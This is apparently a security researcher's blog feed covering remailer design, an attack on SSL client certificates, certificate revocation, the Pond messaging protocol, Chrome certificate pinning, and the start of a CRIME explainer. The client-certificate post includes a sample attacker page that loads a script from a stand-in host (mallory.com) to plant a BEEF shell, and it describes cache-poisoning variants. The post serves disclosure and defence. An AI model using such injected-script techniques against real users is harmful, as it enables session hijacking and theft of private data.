    <tr>
        <td>Second Hop</td>
        <td>First Hop -> Third Hop
        <td><img src="/resources/cryptodotis/post1/bluewhole-message-green.png" />
        <td><span style="color:green">Sender (You)</span>, <span style="color:green">Recipient, Message</span></td>
    </tr>
    <tr>
        <td>Network Observer<br /> between Second &amp; Third Hops</td>
        <td>Second Hop -> Third Hop</td>
        <td><img src="/resources/cryptodotis/post1/greenwhole-message-green.png" />
        <td><span style="color:green">Sender (You)</span>, First Hop, <span style="color:green">Recipient, Message</span></td>
    </tr>
    <tr>
        <td>Third Hop</td>
        <td>Second Hop -> Recipient
        <td><img src="/resources/cryptodotis/post1/greenwhole-message.png" />
        <td><span style="color:green">Sender (You)</span>, First Hop</td>
    </tr>
    <tr>
        <td>Network Observer<br /> between Third Hop &amp; Recipient</td>
        <td>Third Hop -> Recipient</td>
        <td><img src="/resources/cryptodotis/post1/message.png" />
        <td><span style="color:green">Sender (You)</span>, First &amp; Second Hops</td>
    </tr>
    <tr>
        <td>Recipient</td>
        <td>Third Hop -> Them
        <td><img src="/resources/cryptodotis/post1/message.png" />
        <td><span style="color:green">Sender (You)</span>, First &amp; Second Hops</td>
    </tr>
</table>

<h2>In Comparison to Tor</h2>

<p>If you're familiar with Tor, you may be thinking that this is just like it. And while it does look very similar to Tor, there are a few major differences in the details.</p>

<h4>High Latency and Pooling</h4>
<p>Latency is a measure of time delay experienced in a system.  If you run <span class="packet">ping 127.0.0.1</span> you'll get a response back immediately - essentially no latency.  But if you run <span class="packet">ping 8.8.8.8</span> you will see some (probably small) number of milliseconds elapse before you get a response.  That's latency.  A 'Low Latency' network means as soon as a node receives a packet, it sends it out.  A 'High Latency' network means a node will hold onto a message for some amount of time before sending it out.</p>

<p>Traffic Analysis is a <em>huge</em> part of network design.  If an attacker is watching the network (and we generally assume they are) - how much information do they gain by watching packet paths, sizes, and times, and how easy is it?  If you see a network flow from Alice to Bob, and Bob to Charlie - those flows will probably be matchable.  With regard to defending against Traffic Analysis, High Latency is preferable - being able to hold onto a packet for any length of time before sending it on gives you a lot more options.  </p>

<p>Tor is a 'Low Latency' network - it has no choice because it's infeasible to browse the Internet with minute-long (or longer) delays during page loads.  However, email can have delays - if an email doesn't arrive for 30 minutes or an hour, it's generally not a problem.  So Remailers can afford to be a High Latency network. They will accumulate a number of messages in a pool, and then when the pool is a certain size, will send the messages out.  There are multiple algorithms for pooling, and we'll go into more detail about them and pool attacks later.</p>
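A minimal sketch of the simplest such scheme, a threshold mix, is below.  This is an assumed illustration, not any particular remailer's algorithm - real pooling schemes are more sophisticated:

```python
import random

class ThresholdMix:
    """Toy threshold mix: hold messages in a pool, and when the pool
    reaches a threshold, flush them all in random order so arrival
    order can't be correlated with departure order."""

    def __init__(self, threshold):
        self.threshold = threshold
        self.pool = []

    def receive(self, message):
        self.pool.append(message)
        if len(self.pool) >= self.threshold:
            return self.flush()
        return []                      # message held; nothing leaves yet

    def flush(self):
        random.shuffle(self.pool)      # break the arrival ordering
        out, self.pool = self.pool, []
        return out
```

An observer sees the threshold-sized batch leave at once, but not which incoming message became which outgoing one.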

<h4>Padding</h4> 
<p>If a network did not pad messages, and you sent a packet of length 1337, each node would receive and send a packet of length 1337 all the way to the final destination.  This aids traffic analysis attacks, because someone watching a node can see the sizes of the packets received and sent, and it makes it easier to track the traffic across nodes - even when multiple people are using the nodes.</p>

<p>Tor pads messages into 512-byte cells.  If you want to send 1337 bytes of data, it will (probably) be sent in 3 separate cells.  Remailers pad all messages also, but to a larger size (on the order of 10 or 28 KB).  We'll go into more detail about padding, and what happens when a message is larger than the chosen pad size - but the point is padding makes it more difficult to correlate messages, and when combined with pooling helps defend against traffic analysis.</p>
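As a rough sketch, splitting a payload into padded fixed-size cells might look like this.  The 2-byte length prefix is a simplification of my own - real Tor cells carry more header fields:

```python
CELL_SIZE = 512   # Tor's cell size
HEADER = 2        # toy length prefix (real cells have larger headers)

def to_cells(payload):
    """Split a payload into fixed-size cells, zero-padding the last."""
    body = CELL_SIZE - HEADER
    cells = []
    for i in range(0, len(payload), body):
        chunk = payload[i:i + body]
        cell = len(chunk).to_bytes(HEADER, "big") + chunk
        cells.append(cell.ljust(CELL_SIZE, b"\x00"))  # uniform size on the wire
    return cells

def from_cells(cells):
    """Recover the payload by reading each cell's true length."""
    return b"".join(c[HEADER:HEADER + int.from_bytes(c[:HEADER], "big")]
                    for c in cells)
```

With these numbers, a 1337-byte payload becomes three identical-looking 512-byte cells, matching the example above.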

<h2>Conclusion</h2>

<p>We hope this is an understandable introduction to remailers.  In our next post we'll look at two existing remailer networks and some of the subtleties of their designs.  We hope to produce a series of remailer blog posts, eventually going into detail about topics such as pooling algorithms and attacks, directory services attacks, mix packet formats, traffic analysis, padding sizes, and other topics that must be considered when designing remailer networks. </p>

<p><em style="font-size:small;">This blog post is licensed under <a href="http://creativecommons.org/licenses/by/3.0/us/">Creative Commons Attribution 3.0 United States License</a> and is inspired by, and makes heavy use of, the images produced by the EFF & Tor Project <a href="https://www.torproject.org/about/overview.html.en">here</a>.</em></p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-remailer_blog_posts.html</guid>
		<title>Remailer Blog Posts</title>
		<pubDate>07 Jan 2013 21:52 EST</pubDate>
		<description><![CDATA[
<p>I don't write a lot, so when I do write for another blog (usually an employer's) I tend to go to pains to copy the blog post here (with a credit).  Today I've published five technical blog posts for another blog, but I'm not reposting them - I'm just pointing at them.  They're hosted on the same machine as this one, just on a separate domain, so I'm not worried about losing them.</p>

<blockquote>
<p>Crypto.is kicks off its blog with a series of articles about remailers! These are the first several installments in what is intended to be a series on how remailers work, the theory behind them, and many of the choices that must be considered. Some of the topics we intend to dive deeply into in the future are how to run a directory of remailer nodes, how to handle messages that overflow the packet size, more details on Mixminion, as-yet-unimplemented academic papers (like Pynchon Gate and Sphinx), and more! Check out posts <a href="https://ritter.vg/blog-cryptodotis-what_is_a_remailer.html">One</a>, <a href="https://ritter.vg/blog-cryptodotis-remailers_weve_got.html">Two</a>, <a href="https://ritter.vg/blog-cryptodotis-tagging_attacks.html">Three</a>, <a href="https://ritter.vg/blog-cryptodotis-packet_formats_1.html">Four</a>, and <a href="https://ritter.vg/blog-cryptodotis-tagging_attack_on_mixmaster.html">Five</a>. The comments section should work, so please do leave comments if you have questions, insights, or corrections!</p>
</blockquote>

<p>These blog posts are:</p>
<table border="0" style="width:100%">

<tbody><tr>
<td style="width:5%">5</td>
<td style="width:47%"><a href="https://ritter.vg/blog-cryptodotis-tagging_attack_on_mixmaster.html">A Tagging Attack on Mixmaster</a></td>
<td style="width:47%">05 Jan 2013 23:48:00 EST by <a href="https://ritter.vg">Tom Ritter</a></td>
</tr>

<tr>
<td style="width:5%">4</td>
<td style="width:47%"><a href="https://ritter.vg/blog-cryptodotis-packet_formats_1.html">Packet Formats 1 of 3(?)</a></td>
<td style="width:47%">05 Jan 2013 23:47:00 EST by <a href="https://ritter.vg">Tom Ritter</a></td>
</tr>

<tr>
<td style="width:5%">3</td>
<td style="width:47%"><a href="https://ritter.vg/blog-cryptodotis-tagging_attacks.html">Tagging Attacks</a></td>
<td style="width:47%">05 Jan 2013 23:46:00 EST by <a href="https://ritter.vg">Tom Ritter</a></td>
</tr>

<tr>
<td style="width:5%">2</td>
<td style="width:47%"><a href="https://ritter.vg/blog-cryptodotis-remailers_weve_got.html">Remailers We've Got</a></td>
<td style="width:47%">05 Jan 2013 23:45:00 EST by <a href="https://ritter.vg">Tom Ritter</a></td>
</tr>

<tr>
<td style="width:5%">1</td>
<td style="width:47%"><a href="https://ritter.vg/blog-cryptodotis-what_is_a_remailer.html">What is a Remailer?</a></td>
<td style="width:47%">05 Jan 2013 23:44:00 EST by <a href="https://ritter.vg">Tom Ritter</a></td>
</tr>

</tbody></table>

<p>I put a lot of effort into them, and it goes into (what I think) are fairly complicated topics like tagging attacks, so I hope you like them!</p>

<div style="text-align:center"><img src="https://ritter.vg/resources/cryptodotis/post3/tagging.png" /></div>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-an_attack_on_ssl_client_certificates.html</guid>
		<title>An Attack on SSL Client Certificates</title>
		<pubDate>07 Jan 2013 21:40 EST</pubDate>
		<description><![CDATA[
<p>SSL is designed to provide Authenticity, Confidentiality, and Integrity. If an attacker is performing a Man in the Middle attack, they can slow down or close an SSL connection - but they cannot modify or learn the contents. The attacker should also not be able to impersonate the server - that's the Authenticity part. But Authenticity relies on Certificate Authorities - the attacker cannot impersonate a site because a CA will verify the applicant controls the domain applied for. In the past couple years, though, we've seen some cracks there that have allowed advanced attackers to impersonate arbitrary and high-profile sites on the Internet. And of course, non-validating clients or installing a rogue CA into your trust store would make this easy too.</p>

<p>Most websites authenticate a user using a username and password over HTTP. If an attacker is able to impersonate a website to a user they are able to use that ability to steal the username and password, talk to the website pretending to be the user, and proxy the data back and forth. Client certificates provide a stronger degree of authentication. An attacker can impersonate a website to a user, but cannot impersonate the user to the website because they do not know the client's private key. This severely limits the attacker: generally speaking the attacker is interested in learning the user's stored data on the server: for example the user's email. To accomplish this when the user authenticates with client certificates, the attacker would need the client certificate - to retrieve it they would have to exploit the user's browser or try a social engineering attack to trick the user into running malware manually. While those attacks are possible, they are not reliable or stealthy.</p>

<p>However, an attacker who is able to impersonate the server to the user can effectively break into the SSL connection with the legitimate server, and exfiltrate the sensitive data - even with client certificate authentication. In addition to impersonating the server, the attacker must be able to intercept and manipulate the client's outbound network traffic. By relying on the Same Origin Policy, the attacker can trick the client into running javascript of the attacker's choosing that exfiltrates the data - while leaving the Client Certificate-authenticated SSL channel untouched.</p>

<p>There are two techniques one can use to accomplish this. The simpler technique relies on impersonating any third-party SSL-protected javascript include - for example to target <a href="https://developers.google.com/speed/libraries/devguide">Google's hosted libraries</a>. By acting as Google, you can inject a <a href="http://beefproject.com/">BEEF shell</a> and view the user's content.</p>

<div style="text-align:center"><img src="/resources/clientcerts/alice.jpg" alt="Alice"/></div>

<p>That's a pretty obvious technique - by including two forms of authentication (mutual and one-sided) the site has effectively downgraded themselves to the lesser of the two. However, if the site has removed all third-party includes and authenticates all javascript using Client Certificates - it is still possible to perform the attack. In this instance, Alice tries to connect to Bob's site, but is intercepted by Mallory. Mallory can impersonate Bob to Alice, but cannot impersonate Alice to Bob, because Alice connects using a client certificate.</p>

<div style="text-align:center"><img src="/resources/clientcerts/alice_2.jpg" alt="Alice 2"/></div>

<p>With this new attack technique, Alice tries to connect to Bob, but is intercepted by Mallory. Mallory impersonates Bob to Alice, and requests a client certificate, which Alice expects. Alice selects her client certificate, which Mallory will accept without performing any certificate validation. After the TLS handshake is complete, Mallory returns a page that looks like this:</p>

<pre>&lt;html&gt;&lt;body&gt;
   &lt;script src="https://mallory.com/d.js"&gt;&lt;/script&gt;
   &lt;iframe src="https://mail.corp.com" /&gt;
&lt;/body&gt;&lt;/html&gt;</pre>

<p></p>

<p>Mallory also sends a HTTP Connection:close directive and closes the SSL and TCP connection.</p>

<div style="text-align:center"><img src="/resources/clientcerts/alice_3.jpg" alt="Alice 3"/></div>

<p>When Alice retrieves this page, she will make two subsequent connections. First, the request for d.js, which Mallory fields and replies with a BEEF shell or similar mechanism that allows her to control the page. Second, the request for mail.corp.com for the iframe, which Mallory does <em>not</em> intercept, but rather passes the connection to Bob legitimately. Alice initiates a new TLS handshake, authenticates herself to Bob, Bob authenticates himself to Alice, and the channel is mutually trusted. Mallory cannot read inside this connection, but using her javascript shell, can manipulate the page in the iframe thanks to the same-origin policy.</p>

<div style="text-align:center"><img src="/resources/clientcerts/alice_4.jpg" alt="Alice 4"/></div>

<p>A more insidious attack would be to poison the user's browser cache or HTML5 Local Storage. For a cache poisoning attack, because a javascript file does not contain user-specific or attacker-unknown data, an attacker could download the server's version of the Javascript file, using their valid credentials, poison it, and then serve it to the attacked user. If the attacker can force the browser into caching the document, it will be used on subsequent connections to the site, giving the attacker full control again. For HTML5 Local Storage, if a site used the clientside storage to store data or code, an attacker could read sensitive data or insert malicious javascript.</p>

<p>Unfortunately, there's not much that can be changed in browsers to mitigate this attack. Any form of short-term certificate pinning (as is done with DNS pinning to thwart <a href="https://en.wikipedia.org/wiki/DNS_rebinding">DNS Rebinding</a>) will break some uses of certificates on the internet: either different certificates on subdomains, CDNs, paths that route to a new webserver, or the case where every webserver has its own SSL certificate (the 'Citi Bank' problem, as dubbed by Moxie).</p>

<p>One mitigation is to prevent yourself from being framed using the X-Frame-Options: DENY header (SAMEORIGIN will leave you vulnerable), pairing this with <a href="https://en.wikipedia.org/wiki/Framekiller">javascript framebusting</a> for older clients. However, this does not protect against browser cache or local storage poisoning.</p>

<p><em>This post originally appeared on <a href="https://isecpartners.com/news-events/news/2012/december/an-attack-on-ssl-client-certificates.aspx">iSEC Partners' blog</a>.</em></p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-revocation_paper.html</guid>
		<title>Fixing revocation for web browsers on the internet</title>
		<pubDate>07 Jan 2013 21:32 EST</pubDate>
		<description><![CDATA[
<p>This is a tad dated, but I need to catch this blog up to the blog posts I've authored for my employer's blog.  Here's the blurb for a whitepaper I authored on revocation in web browsers.</p>

<blockquote>
<p>The past couple years have seen a number of Certificate Authority compromises that have resulted in fraudulent certificates being issued for high-profile sites.  This has shone a spotlight on Certificate Authority practices and on the current trust calculation present in web browsers.  Two years ago, iSEC Partners collaborated with the EFF to create the <a href="https://www.eff.org/observatory">SSL Observatory</a>: a window into the issuing practices of CAs, and this year released a scanning tool, sslyze, that can be used to scan for SSL misconfigurations.  SSL is a critical piece of Internet infrastructure and has been a long-time research focus for iSEC Partners.</p>

<p>Recently, I've been interacting with the Certificate Authority/Browser Forum on the topic of Certificate Revocation.  Many projects - DANE, Convergence, TACK, and numerous others - cover the topic of initial trust (do I trust this certificate or not?), but the issue of revocation has been left largely alone, with the exception of Chrome's development of <a href="http://www.imperialviolet.org/2012/02/05/crlsets.html">crl-sets</a>. But recovering from failure is at least as important as protecting ourselves from it in the first place, so we have an interest in making sure revocation provides the properties that we desire.  At the September meeting of the CA/B Forum, I presented what I feel is the correct path forward for revocation checking in web browsers.</p>

<p>The paper I presented identifies five key properties a revocation system should provide: to be Privacy Preserving, to be Performant, to have No Single Point of Failure, to Uniquely Identify a Certificate, and finally, to be Effective.  After evaluating the possible ways forward, I suggest the path of least resistance and the methodology that can be followed to move us towards a web where you are confident in the status of a certificate.  Unfortunately, this requires a concerted effort to develop, test, and deploy updated versions of web servers and convince stakeholders of the benefits of doing so.  This paper is meant to spur conversation and be a proposal that others can be compared to. The discussion at the CAB forum overall was positive, and I appreciated the opportunity to meet and discuss these issues with people who also care passionately about this niche of the web infrastructure.</p>

<p>Read our whitepaper <a href="https://isecpartners.com/research/white-papers/fixing-revocation-for-web-browsers-on-the-internet.aspx">Here</a></p>
</blockquote>

<p><em>This post originally appeared on <a href="https://isecpartners.com/news-events/news/2012/november/fixing-revocation-for-web-browsers-on-the-internet.aspx">iSEC Partners' blog</a>.</em></p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-initial_pond_thoughts.html</guid>
		<title>Some Initial Thoughts on Pond</title>
		<pubDate>24 Nov 2012 17:11 EST</pubDate>
		<description><![CDATA[
<p><a href="https://github.com/agl/pond">Pond</a> is a personal project published this weekend by <a href="http://www.imperialviolet.org/">Adam Langley</a>.  Adam is wicked smart and manages both Google's SSL infrastructure and Chrome's SSL implementation (and all the nifty SSL features Chrome throws in, like NPN and DNSSEC Stapled Certs). So when he tweeted about Pond, I knew it was worth a very close look.  Pond is a new encrypted messaging protocol and implementation, akin to encrypted E-Mail but with some differences.  This blog post is less a critical analysis of its security or design, and more some initial thoughts on the architecture.  It's light on introduction, so you may want to read <a href="https://github.com/agl/pond">the project's README</a> for background.</p>

<h2>Permitted Senders</h2>

<p>Firstly, Pond can be thought of as similar to email.  It's asynchronous, which means you can send messages to someone even if they're not 'online', and a server will receive and store them on the user's behalf.  The user can in turn connect to their server and retrieve messages when their client is online.  However, the first big difference between Pond and E-mail is <em>you cannot 'pond' someone who has not permitted it</em>, where 'pond' is me verbing the noun.  This is a huge, huge difference between Pond and E-Mail, and honestly I think it makes Pond much less useful than I'd like. The reason behind this is Spam, and that's not a bad reason. I'm a bit young to have been around when the 'require email to have a proof of work' arguments were ensuing, but a cursory survey indicates <a href="http://www.cl.cam.ac.uk/~rnc1/proofwork.pdf">one argument against it</a> was based around legitimate bulk email services. I don't know if that's relevant to Pond, so perhaps it's worth revisiting this debate.</p>

<p>Anyway, Pond enforces the notion of allowed senders, by using a group signature scheme.  The group signature scheme allows your pondserver (analogous to mailserver) to verify that the person ponding you is a member of your allowed group, but cannot verify who exactly in the group it is.  If you want to revoke the ability of someone to pond you, you can do that, but everyone on your accepted list will learn that you revoked <em>someone</em>.  </p>

<p>Because messages are forward secure and the protocol is based on OTR, you the user must communicate a <a href="https://github.com/agl/pond/blob/master/protos/pond.proto#L114">KeyExchange</a> message to your intended contact out of band over a secure channel.  The KeyExchange message includes less sensitive things like your server address, and private things like the private key that particular user will use to participate in the group signature.</p>

<h2>Message Sizes</h2>

<p>All messages that are exchanged between the client and the server are 16KB - whether the user is checking his messages, sending a message, making a revocation, or otherwise.  Pond currently <a href="https://github.com/agl/pond/blob/master/client/network.go#L35">does not support messages larger than 16KB</a>.  I wish I had a blog post written on how remailers handle oversized messages - it's not pretty.  This is a hard problem.  Both Mixmaster and Mixminion will chunk oversized messages into constant-sized fragments, although Mixminion will apply a <a href="http://www.mixminion.net/E2E-spec.txt">K of N scheme</a> to allow reconstruction from a subset of fragments.</p>
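<p>To make the constant-size idea concrete, here's a minimal sketch of how a client might pad every payload to a uniform frame.  This is <em>not</em> Pond's actual wire format - the length prefix and padding scheme are my own assumptions for illustration:</p>

```python
MSG_SIZE = 16 * 1024  # every client<->server frame is exactly this size

def pad_to_frame(payload: bytes) -> bytes:
    """Prefix the payload with its length and zero-pad to MSG_SIZE."""
    if len(payload) > MSG_SIZE - 4:
        raise ValueError("payload too large for a single frame")
    body = len(payload).to_bytes(4, "big") + payload
    return body + b"\x00" * (MSG_SIZE - len(body))

def unpad_frame(frame: bytes) -> bytes:
    """Recover the original payload from a constant-size frame."""
    n = int.from_bytes(frame[:4], "big")
    return frame[4:4 + n]
```

<p>The point is that a network observer sees only uniform 16KB frames, whether the frame carries a message, an ACK, or a revocation.</p>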

<p>The issue with oversized messages is that they can be used to deanonymize a user.  Send a user a 500MB message, and then watch all Remailer/Pond users to see who retrieves a 500MB message.  This is easier when the attacker is the sender of the large file, but it can work regardless if the attacker knows a large file is going to be sent.  There's not a great solution for this problem - but it's a pretty important one to at least try to solve.  It's fairly easy to anonymously/pseudonymously send text - we have a number of techniques.  But we don't have a great system for sending media: images, video, PDFs.</p>

<h2>Future Directions</h2>

<p>Some things I think would be worth looking much closer at:</p>

<ul>
<li>Does the omission of the KeyID in the <a href="http://www.cypherpunks.ca/otr/Protocol-v3-4.0.0.html">OTR Protocol</a> hurt anything?</li>
<li>The implications of a KeyExchange structure being disclosed after a number of messages are exchanged.</li>
<li>Is there a server DoS possibility by asserting the server must confirm the group signature of the client?  Can a proof of work be inserted to ameliorate this?</li>
<li>The use of ACKs makes me nervous and reminds me of Read Receipts.  And no one likes those. Could there be another way to ratchet DH values?  Maybe prefill the server with an encrypted-to-the-contact value or values to give them?</li>
<li>Does the Pond Server or Client leak distinguishing information in the form of time skew? Probably, but most things do, so don't hold it against Pond.</li>
</ul>

<p>Also, I think something else that would be worth considering is changing the notion of contacts you can communicate with, to contacts you can communicate <em>large messages</em> with.  The changes, which are not trivial, would look like this:</p>

<ol>
<li>The 16KB size is upped to something more like 128KB.</li>
<li>Your accepted contacts become the "permitted large senders" list.  These users are permitted to send you messages larger than 128KB.  It'd be nice to restrict them to 32KB, but this may not be possible while asserting that the server cannot read the messages for a user.</li>
<li>A server will send either the list of queued messages, if the contents of the list total >128KB, or the whole messages if less.</li>
<li>Messages larger than 128KB are not downloaded by default - the user can choose to delete them on the server, explicitly download them as one-time-large chunks, or perform a de- and re-encryption on the server to be able to download the message in 128KB chunks.</li>
<li>When an unaccepted contact wants to pond you, the server will conduct the initial steps of the DH Key Exchange on behalf of the user, package up the sensitive parts for the user, and queue them for delivery to the user as well.</li>
</ol>
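<p>A rough sketch of the server-side decision in step 3 - the threshold and the response shapes here are purely my own invention for illustration:</p>

```python
LARGE = 128 * 1024  # proposed frame-size ceiling from step 1

def checkin_response(queued):
    """Return whole messages when the queue is small; otherwise return
    just a listing so the client can decide what to download or delete."""
    total = sum(len(m) for m in queued)
    if total > LARGE:
        return {"type": "listing", "sizes": [len(m) for m in queued]}
    return {"type": "messages", "messages": queued}
```

<p>The client-side counterpart would then implement step 4: skip, delete, or chunk-download anything in the listing that's over the threshold.</p>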

<p>That list is very handwavey - I haven't really thought through the implications of things like the de- and re-encryption on the server; or the change in threat model.  For instance, if a server is compromised after an untrusted person ponds you, the attacker should not be able to read those queued messages; but if a new untrusted person ponds you post-compromise, the attacker would be able to read that message.  That may be unacceptable.  The IMAP/Newsgroup nature of getting a list of messages and choosing to download individual ones might be a horrible idea too.  Pond is experimental.  I'm happy to throw out a bunch more experimental ideas and try to figure out why they're bad ideas.</p>

<p>Also, I'd like to take this opportunity to thank Adam for his work.  This is experimental software and an experimental protocol.  But experiments are good.</p>

<p><strong>Update:</strong> If you're reading this on the front page, be sure to <a href="/blog-initial_pond_thoughts.html">click through</a> to see Adam's comment response.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-cas_and_pinning.html</guid>
		<title>Certificate Authorities &amp; Pinning</title>
		<pubDate>10 Nov 2012 20:53 EST</pubDate>
		<description><![CDATA[
<p>So Google Chrome has a preloaded list of sites they can force SSL on (Strict Transport Security) and certificates they can pin to (Public Key Pinning).  You can request that your site be added to this list <a href="http://dev.chromium.org/sts">over here</a>.  But Chrome is open source, so you can look at the code behind this.  The relevant file is <a href="http://src.chromium.org/viewvc/chrome/trunk/src/net/base/transport_security_state.cc?revision=162540&amp;view=markup">transport_security_state.cc</a> and the actual list of directives is in <a href="http://src.chromium.org/viewvc/chrome/trunk/src/net/base/transport_security_state_static.json?revision=162705&amp;view=markup">transport_security_state_static.json</a>.  Inside that list of directives (and I'm linking to the latest revision, not trunk), there's a property called bad_static_spki_hashes.</p>

<pre type="syntaxhighlighter" class="brush: js; toolbar: false">
//   bad_static_spki_hashes: (optional list of strings) the set of forbidden SPKIs hashes
</pre>

<p>If we look at the only time that's used, it's used by Google.</p>

<pre type="syntaxhighlighter" class="brush: js; toolbar: false">
    {
      "name": "google",
      "static_spki_hashes": [
        "VeriSignClass3",
        "VeriSignClass3_G3",
        "Google1024",
        "Google2048",
        "EquifaxSecureCA"
      ],
      "bad_static_spki_hashes": [
        "Aetna",
        "Intel",
        "TCTrustCenter",
        "Vodafone"
      ]
    },
</pre>

<p>Those certificates: Aetna, Intel, TCTrustCenter, and Vodafone are defined in <a href="http://src.chromium.org/viewvc/chrome/trunk/src/net/base/transport_security_state_static.certs?revision=138796&amp;view=markup">transport_security_state_static.certs</a> (again, revision specific not trunk).  They were added in <a href="http://src.chromium.org/viewvc/chrome/trunk/src/net/base/transport_security_state.cc?r1=107993&amp;r2=108293">this diff</a> with the comment "net: reject other intermediates from Equifax" which references a private <a href="http://codereview.chromium.org/8372032">code review request</a> and <a href="https://code.google.com/p/chromium/issues/detail?id=102456">bug</a>.  When I open them on Windows 7, they all chain to the GeoTrust root with fingerprint d23209ad23d314232174e40d7f9d62139786633a.  GeoTrust (who bought <a href="http://en.wikipedia.org/wiki/GeoTrust">Equifax</a>'s CA program) is the company that ran the <a href="http://www.prnewswire.com/news-releases/geotrust-launches-georoot-allows-organizations-with-their-own-certificate-authority-ca-to-chain-to-geotrusts-ubiquitous-public-root-54048807.html">GeoRoot</a> program, allowing companies to have their own root.</p>

<p>Are these <em>MITM Certificates?</em> <strong>No.</strong> But before I explain how they're not, a little background:</p>

<p>The practice of issuing companies <em>publicly trusted</em> Certificate Authorities <em>for the purpose of performing MITM on their employees</em> is extremely shady and dangerous and resulted in lots of <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=724929">bad press</a> for Trustwave when they issued one to Micros Systems.  They revoked it, and came clean - and I applauded them for it.  In the fallout, Mozilla <a href="https://wiki.mozilla.org/CA:Communications#Responses">told CAs they couldn't do this and be included in their root program</a>.  They had to either not let the root out of their control, or technically or contractually constrain it to explicitly disallow MITM purposes.</p>

<p>The responses from the CAs <a href="https://docs.google.com/spreadsheet/pub?key=0Ah-tHXMAwqU3dGxsWlZEdGFDaW9JTlNTUGxBNWhqSlE&amp;output=html">came back</a>.  Geotrust said "SubCAs are technically and/or contractually restricted to only issue certificates to domains that they legitimately own or control, and they are specifically not allowed to use their subordinate certificates for the purpose of MITM." And also that they were in the process of "[adding] a statement to [their] CP/CPS committing that [the company] will not issue a subordinate certificate that can be used for MITM or 'traffic management' of domain names or IPs that the certificate holder does not legitimately own or control."  And let's take a look at the four certificates blacklisted in Chrome:</p>

<dl>
<dt>Vodafone &amp; Aetna</dt>
<dd>Vodafone expired in July 2011, Aetna in Aug 2012.  Looking at Mozilla's and Windows' Trust Store I don't see an Aetna or a Vodafone.</dd>

<dt>Intel</dt>
<dd>This is a <strong>trusted Signing CA that is still valid</strong>.  It can do a lot too: Digital Signature, Certificate Signing, Off-line CRL Signing, CRL Signing.  It has a <a href="http://www.intel.com/repository/CRL/Intel%20External%20Basic%20Policy%20CA.crl">Public CRL</a> that refreshes <em>every three months</em> with no entries.  Its other pointers go to <a href="http://certificates.intel.com/repository/CRL/Intel%20External%20Basic%20Policy%20CA.crl">unresolvable</a> <a href="http://certificates.intel.com/repository/certificates/Intel%20External%20Basic%20Policy%20CA.crt">domains</a>. I can't find an Intel in my trust stores.</dd>

<dt>TC TrustCenter</dt>
<dd>This is the strangest one to me - because I <em>do</em> have it in my Trust Store.  I have "TC Trust Center Class 2 CA II", "TC Trust Center Universal CA I" and "III", and "TC Trust Center Class 3 CA II" in Mozilla and nothing in Windows (but Windows has some weird polling-the-server stuff IIRC).  So if some of TC Trust Center is trusted, why isn't this one?  Also, it's <strong>still valid</strong>.  Its CRL is <a href="http://crl.geotrust.com/crls/secureca.crl">GeoTrust's</a>.</dd>
</dl>

<p>Now these <em>are not</em> MITM certificates.  They have been in use on the public internet, and if you search through the <a href="https://www.eff.org/observatory">SSL Observatory</a> data you will find both the certificates themselves and instances of them signing public certificates.  So it's pretty clear these aren't hidden certificates or anything. <strong>But</strong> the existence of these certificates is still troubling for a brand-new reason: Certificate Pinning.</p>

<p>Certificate Pinning - either by <a href="http://tack.io/">TACK</a>, the upcoming <a href="https://datatracker.ietf.org/doc/draft-ietf-websec-key-pinning/">HTTP Header</a>, Chrome's aforementioned system, or <a href="http://thoughtcrime.org/blog/authenticity-is-broken-in-ssl-but-your-app-ha/">other methods</a> - allows you to pin to a leaf certificate or a Certificate Authority's root.  If clients see a certificate signed by anything other than the pinned certificate (key, technically) - they will reject the certificate.  It allows you to limit the number of signing CAs from dozens or hundreds to a couple of Intermediates.  But just how many Intermediate (signing) certificates hang off that root you just pinned?  You can get a sense of it from the SSL Observatory - but just a sense, because they're not all disclosed.</p>
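<p>In rough terms, the check a pinning client performs looks like the sketch below.  This is my own illustration of the logic, not Chrome's actual implementation, and the hash names are placeholders:</p>

```python
def chain_passes_pins(chain_spki_hashes, pinned, blacklisted):
    """chain_spki_hashes: SPKI hashes of every key in the presented chain."""
    # Any explicitly-banned key anywhere in the chain is fatal...
    if any(h in blacklisted for h in chain_spki_hashes):
        return False
    # ...and at least one key in the chain must match a pin.
    return any(h in pinned for h in chain_spki_hashes)
```

<p>This is why the bad_static_spki_hashes list exists: pinning to a root alone would otherwise accept every Intermediate hanging off that root.</p>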

<p>And that's what Google has done.  They wanted to pin GeoTrust - but <em>not</em> these other Intermediates.  So they had to take explicit steps to prevent these four certificates from being able to sign for Google properties, ever ever ever.  So if you're evaluating a Certificate Authority, and you want to pin to them, this should factor into your calculations. Mozilla is <a href="https://groups.google.com/forum/?fromgroups=#!topic/mozilla.dev.security.policy/0jnELviAxxo%5B1-25%5D">working on this</a> to provide greater transparency for these 'unknown' Intermediates, which are a subject of great debate.</p>

<script type="text/javascript">
$(document).ready(function(){
	addScript('resources/scripts/shBrushJScript.js');
	SyntaxHighlighter.all();
});
</script>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-crime.html</guid>
		<title>Details on CRIME</title>
		<pubDate>17 Sep 2012 11:11:34 EST</pubDate>
		<description><![CDATA[
<!-- =============================================================================================== -->
<h2>Background</h2>

<p>Juliano Rizzo and Thai Duong, the authors of the BEAST attack on SSL (or TLS - used interchangeably here), have released a new attack dubbed CRIME, or Compression Ratio Info-leak Made Easy.  The attack allows an attacker to reveal sensitive information that is being passed inside an encrypted SSL tunnel.  The most straightforward way to leverage this vulnerability is to use it to retrieve cookies being passed by an application and use them to login to the application as the victim.</p>

<p>CRIME is known to work against SSL Compression and SPDY.  SPDY is a special HTTP-like protocol developed by Google, and used sparingly around the web.  According to <a href="http://blog.ivanristic.com/2012/09/it-seems-that-it-is-that-time-of-year-again-when-julian-and-thai-present-their-most-recent-attack-against-crypto-system-t.html">Ivan Ristic's statistics</a>, gathered by <a href="https://www.trustworthyinternet.org/ssl-pulse/">SSL Pulse</a>, about 42% of the servers support SSL compression, and SPDY support is at 0.8%.  SSL Compression is an optional feature that may or may not be enabled by default - it's unlikely to have been explicitly configured.  SPDY however is something that would be explicitly designed into your web application.</p>

<!-- =============================================================================================== -->
<h3>Technique</h3>

